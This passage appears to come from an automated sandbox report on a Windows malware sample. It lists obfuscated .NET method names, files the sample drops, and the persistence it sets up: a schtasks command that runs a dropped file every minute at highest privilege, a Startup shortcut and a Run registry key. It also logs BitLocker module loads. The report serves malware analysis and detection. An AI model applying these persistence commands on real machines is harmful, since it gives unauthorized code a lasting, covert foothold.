'DPnUj4NQ5rq9dCZUOuoLGpKPuHkgCiI4kuqac2Ggd9ndTKmHSh2tznYgXYojkYyMjAmxwhoI7QSP3wNZRhVF0', 'p1XOSKQyP9RuZBRNZM1c800jcqppbOVM6Nxs4qMznZvowsLtVFFc8alOkYs1eVy4b7LBprYn6lIb8THZR4BGd'
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, XRg5CXzghacu61mWJVTLzsueymr.csHigh entropy of concatenated method names: 'w1qPaUREO7T8hRMQz9GQxE25SXN', '_2iHgS5h0BqQUHK7TeTnxAOhnVgM', 'nfd6r5aBUpsy7CE8rO9VJhSYMre', 'OeZXC5mjse5URVGoXdFBLFGQ9fy', 'qVPyN3zZ2Fopgul5Iqx', 'PGah0mI29WHAiwuyJSF', 'jMaMzC3giKZVOXKQcg2', 'SX20c3RWuqbp5JbFd3i', 'yKOiYDyRU4P1NXn4R1H', 'Q6O7Um3JjDhLJWjFZkf'
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, R2IfcvgzWekfqbuZeqPv4fujzXh.csHigh entropy of concatenated method names: 'GBUvwHj9hGdSdzf7eHgmiogVZiC', '_6lCL66hhXp3WGaGlAph3qC3UjvD', 'JmPzGWLVMSN6gbqZm5YCWCyMK2U', 'iEGrLLZwRN1c2ldpS01IjrAzd03', 'x0SK5wTlyL2wUlhFiIW7UcxXFpg', 'qRJdGH6fomWzdv4Z32TxPZYLul0', 'wkXGOCFqfXqw5npMP1P60RX0YT1', 'Lqg8Y6rFujCVFRB2iBAczp8YHpp', 'dNT12v4ke3EiYiRWnUDJrH1PALh', 'N03dsuRLQq27QaHq5wD1VjQZpyd'
                    Source: coding.3.dr, RWYlUp8SC4AqlyeOaRAKtexLHzJLkDNHPRoqbwLt7tyIWcVkPDeBP0TESEdQlABBp6uS3UFLvWhYnwTTrXH2z.csHigh entropy of concatenated method names: 'eWay4ijsjdJkk17wWU7GeteegCJUQiFH46b75RkmCBZp', 'wEXysZZltYsjYTNSi1e0mzHb63Z1TeRJvHnO7WwBdWyH', 'Coc7cRW2Xg6GyVWvawFJXpJSPw2V91gtbrIr3yXyapSB', 'Sg0jsaILtyJNL6YmlWWv0pqdLjui8TT5f7uWOEbtf6kU'
                    Source: coding.3.dr, 51TA3tWw5IuwaflNu15g6hOVOGMSECCRacSwhTwnJLqYyKkuCZ4GVRujK5B.csHigh entropy of concatenated method names: 'gPg8aH1NlxgXZrUR82TrxnwVLduRbHt2dVldLJuGgFs994sKFtyu8nFxnkX', 'N1OEkRyv1WdRTBlNrukmfNHi3ERZ3eO4WmeQxKPsPO26XP3MBQonn2DCNR4', 'VdGKaqwiCkP0Tks33qXRo7nuwxVSUUf9tiBA6K1JOoQbrwzarSIj2GcIaiW', 'yzTdo5JAiTcUNM4Aax0', '_3JRdxbCXECrBO8cWp5U', 'dKQvkQEsn93bzoDpCKF', 'WDnqeUqzNRllozcHXJE', 'fHaF7qEZzWBcqfNqS7e', 'RkoyrXFtso75SWs1IHl', '_929CGkP8u8LURpOeE4m'
                    Source: coding.3.dr, Yu8PsOvdqdBbsmzeNGpgYeaKbq1IkYDLsIBLuKmhZZtjtnxFFYKYRxD6IQ7uNip706VKKdVvdgCs6awfVWcW8UNjklxvuEsRjSO.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_2Jt8Ph2JvZovaSM7QmYCVdSg7ZyuQ2FkFy963KddiN3X9L8A7JnSNaAxuY4', 'bDJQlhxE9uVGMuof3JgGqmKhGxfrfyKBb1v57g7bx6d1xRHYvebFgZIOnIF', 'im1C1FexW7Bd7L2OQkItHQHizq52HsiDPAC6mnymzNDW5miKmlsDS63MOTq', '_3Vqn5nXmRx96TYTukVrLEPtqRCRTSP6dTSnfoo6nTIwHRQnfDPm8aQexlNp'
                    Source: coding.3.dr, 153GVkCW1JSY1j8x1OmHpbOpXJA.csHigh entropy of concatenated method names: 'XRN4Y7KffVBYkqV1gFrkgXj3eyq', 'A489ErlwV9A4dCeG59RzSh9kbzW', 'YOW35931rXD0jFxvxfOXF9qp3e8', 'mdVSAGCsiFQT6SL3QinghcxhUwN', 'VGJj30Tw3qEGKsEE3h70GSWbrnm', 't5UiWvmeSVasrauRTqaeUUbpY6u', 'QqCwprBCyaaw5FD9E6QovodNNCn', 't3bNN1mJNFrbRl2QexvkgxGdlZA', 'Uchszl676AMBmtntJysiVwRXKMQ', 'WIWKuGr40nxtaEQowgzmXtEt7sw'
                    Source: coding.3.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csHigh entropy of concatenated method names: '_7a2RgqA4h9MnAhXwwZRFGCTuKaTbSVvm9Sjn3T9Kw8GalL3bRS7w0LkS2zBOikSk8qpod4BfFp2Aq8ykDxe1H', 'TOBkc6FXFu1mw67EbEmLtZT3bCL1ttQJM8I21kaWj3oDXdQQogEP4E4cf1RQqj9vhIMSr3O8IFPUp4yAWp61U', 'U6VuRIYy46vANFFrFNriRe1vuRMNXp4yfMyK5J11ANoNJY5sBBLnXwQvJ1wvBijG2KRNdADDQ4kDcUbwRRC7i', 'mxRTunPLpaCXGaI6NbC3YPGzqeOA40Do4oFrQj9BchoL8FLAy7aPgK5BKu2dDDUrfR7v8DKCWIikofzcOBI6V', 'v7Y7CLj49Hc0KO0TtSvRtwAOjW2iqinnZwJqjlLhoNHQ8aqSODp16t4qdZTMx7q98GETk18n9HrW7SFsIv0LG', 'T0AeetyOPv4yuEworKv76m0DPX7', 'sqHAqdfVLYznRohHd8e6WTbSIui', 'hsVw0xNOYXaqPvUPQAMNUmELmvE', '_0ymHvWrEkrMuSepPI04uwSas8l1', '_3MGGB8dCJwZrZRxGWLv3DqINsLE'
                    Source: coding.3.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.csHigh entropy of concatenated method names: 'xidvVpyftr0TARr6SyFK120zke5', 'cazNyFjELr2aaOSrDPPwhvLPef0', 'IV7f8BjbMecOHjAFrQqr92Y8mOZ', 'Ut2E7ioakBwDCnVjl3NrOYK0jlF', 'ap82692bj9sL1IPmzthM4moxbeR', 'EXzqiOLGWwfCjJyCkuly48LErA7', 'rTZBWRw4hmwFzvsBKeTxbJsXcQt', 'OAl0dJLveQummh269wwNXBLNdYG', 'b2JxfhLhtRcQxHcPpDM2IvQTp23', '_0CD003T1QUgHbzgeEcc4mzwtJh9'
                    Source: coding.3.dr, 6Dhi8Wb4ZsGZiWpniMf0gM4H4sj.csHigh entropy of concatenated method names: 'e97UE8lAKCPtzzsqopGwpI0JZKD', 'C1Mh5FfC46zqSPZLrEHcvHzSszw5cH6CiDvtUGKIDpUhpURHuKGKiKF8OzAdLblC6f5Lv8jYHOhS7', '_6oCtn4yPIrxkQJxr3QxIfOJ7kMolPcw7nrzUKsrQd97b9ujHM8F9Kmdag301HFb9OHeu8oqwPiH3y', 'uMAoFuu71wW7SoYmIBSR9xa7qqFuk08XYBlq7x8S8waGDa5itFDcAy2TYwN2QGpPUM4W2Uig8ViKP', 'EZJgNSBfT283ehB6J38sl27uAj0OHSofO6kngsQGCtS276vFQvCDORrFIe1zFxbAaULmSJTJ5HE3X'
                    Source: coding.3.dr, Q6RXh22YWFNEsWThUdGyFlXlpv73imik40KVOsv5cQHzChzaLrhtXsFvgTML0HwxoG7yOuzlGFnPqkfILokIJ.csHigh entropy of concatenated method names: 'dWIr7OLiEnuOfkKwsuFLdMQmoC87zAuDww9ykJKUdGKAlD0R29ScllCHtM7GatcTJKDqrhdgfo9nKpeFCAqH4', 'UsPA0yyKrFDT4YMs1WmBxMp71pytyVMBywo9EIlSvZpfXnaT8DAk51OLVk2vY5p8bz3vbLSj6XN1d7DvmCD8C', 'fDHZaLZ51olnlvgTUoW5ZZ1l3jnUgEAyKh981AyB9ob2dFvnoSyXaFhZ2pq6C6IlSXkuVyKl94fSG6kSrWPWQ', 'RPTdjkVwktugaPmgLcahJrBYyUHr6Jhy1QU6dcB17rPoshCrHgoOoaKNoBd0tZ4FyjKI1XTAKib13T9ZVIuts', 'MyivBc7NppTrkV9ty2QHprAhfg8m2I527EC6KeKTYaWCWRRTyIbhCCIU0USUvJhxoustt81iXZUCbSCZIER40', 'bakjUV2m6vbJ6toUEYH1cAAIHcGysvBzRxDl9YPFcYtbevevL5R9r6JoiWhD2bWV9KOyZpbSdFfP1uBRU7awH', '_6BeUae8tSbCFeb4NGv5b9ih1XspUQpbSF0BBVp6VOkWRlYcP6h2pyQWr35NXAbIqJPMDCkQvlXCZXY6DB0tjQ', 'tE0AsQgAwdQqiO8BDrQr5ZcYkg9tfb3e0TR6YLjCXb5SiDthmhMzthas1DmOrEt2OYSMOZG9G4TzoAecECpP1', 'DPnUj4NQ5rq9dCZUOuoLGpKPuHkgCiI4kuqac2Ggd9ndTKmHSh2tznYgXYojkYyMjAmxwhoI7QSP3wNZRhVF0', 'p1XOSKQyP9RuZBRNZM1c800jcqppbOVM6Nxs4qMznZvowsLtVFFc8alOkYs1eVy4b7LBprYn6lIb8THZR4BGd'
                    Source: coding.3.dr, XRg5CXzghacu61mWJVTLzsueymr.csHigh entropy of concatenated method names: 'w1qPaUREO7T8hRMQz9GQxE25SXN', '_2iHgS5h0BqQUHK7TeTnxAOhnVgM', 'nfd6r5aBUpsy7CE8rO9VJhSYMre', 'OeZXC5mjse5URVGoXdFBLFGQ9fy', 'qVPyN3zZ2Fopgul5Iqx', 'PGah0mI29WHAiwuyJSF', 'jMaMzC3giKZVOXKQcg2', 'SX20c3RWuqbp5JbFd3i', 'yKOiYDyRU4P1NXn4R1H', 'Q6O7Um3JjDhLJWjFZkf'
                    Source: coding.3.dr, R2IfcvgzWekfqbuZeqPv4fujzXh.csHigh entropy of concatenated method names: 'GBUvwHj9hGdSdzf7eHgmiogVZiC', '_6lCL66hhXp3WGaGlAph3qC3UjvD', 'JmPzGWLVMSN6gbqZm5YCWCyMK2U', 'iEGrLLZwRN1c2ldpS01IjrAzd03', 'x0SK5wTlyL2wUlhFiIW7UcxXFpg', 'qRJdGH6fomWzdv4Z32TxPZYLul0', 'wkXGOCFqfXqw5npMP1P60RX0YT1', 'Lqg8Y6rFujCVFRB2iBAczp8YHpp', 'dNT12v4ke3EiYiRWnUDJrH1PALh', 'N03dsuRLQq27QaHq5wD1VjQZpyd'
                    Source: C:\Users\user\Desktop\24572628.exeFile created: C:\ProgramData\codingJump to dropped file
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeFile created: C:\Users\user\Desktop\24572628.exeJump to dropped file
                    Source: C:\Users\user\Desktop\24572628.exeFile created: C:\ProgramData\codingJump to dropped file
                    Source: C:\Users\user\Desktop\24572628.exeFile created: C:\ProgramData\codingJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
                    Source: C:\Users\user\Desktop\24572628.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnkJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnkJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run codingJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run codingJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
